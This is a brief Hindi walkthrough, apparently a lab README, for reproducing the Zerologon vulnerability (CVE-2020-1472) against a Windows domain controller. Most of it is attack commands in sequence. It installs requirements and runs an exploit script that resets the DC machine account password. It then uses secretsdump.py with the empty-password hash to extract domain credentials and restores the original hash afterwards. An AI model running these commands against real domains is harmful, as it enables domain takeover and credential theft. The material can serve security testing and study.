
CVE-2020-1472 पुनरुत्पादन प्रक्रिया
पुनरुत्पादन के बाद थोड़ा सा बग है, रीबूट करने पर लॉगिन पेज पर काफी देर तक फंस जाता है। पता नहीं है कि यह केवल मेरे साथ है या नहीं। (वास्तविक वातावरण में उपयोग करते समय सावधान रहें)
व्यावहारिक रूप से, इतिहास हैश को पुनर्प्राप्त करने के लिए secretsdump.py के -use-vss और -history का उपयोग किया जा सकता है।
पहला कदम
pip3 install -r requirements.txt
हैश देखें
secretsdump.py molecule-labs.com/administrator:[email protected] -just-dc-user 'AD$'

हमला
python3 CVE-2020-1472.py AD AD$ 192.168.175.132

डोमेन कंट्रोलर हैश पूछें
secretsdump.py molecule-labs.com/'AD$'@192.168.175.132 -just-dc-user 'AD$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

हैश पुनर्स्थापित करें
python3 reinstall_original_pw.py AD 192.168.175.132 061e8e521872fa93a2f8d89ca0683145

पुनर्स्थापित हैश पूछें
secretsdump.py molecule-labs.com/administrator:[email protected] -just-dc-user 'AD$'

स्क्रिप्ट स्रोत https://github.com/blackarrowsec/redteam-research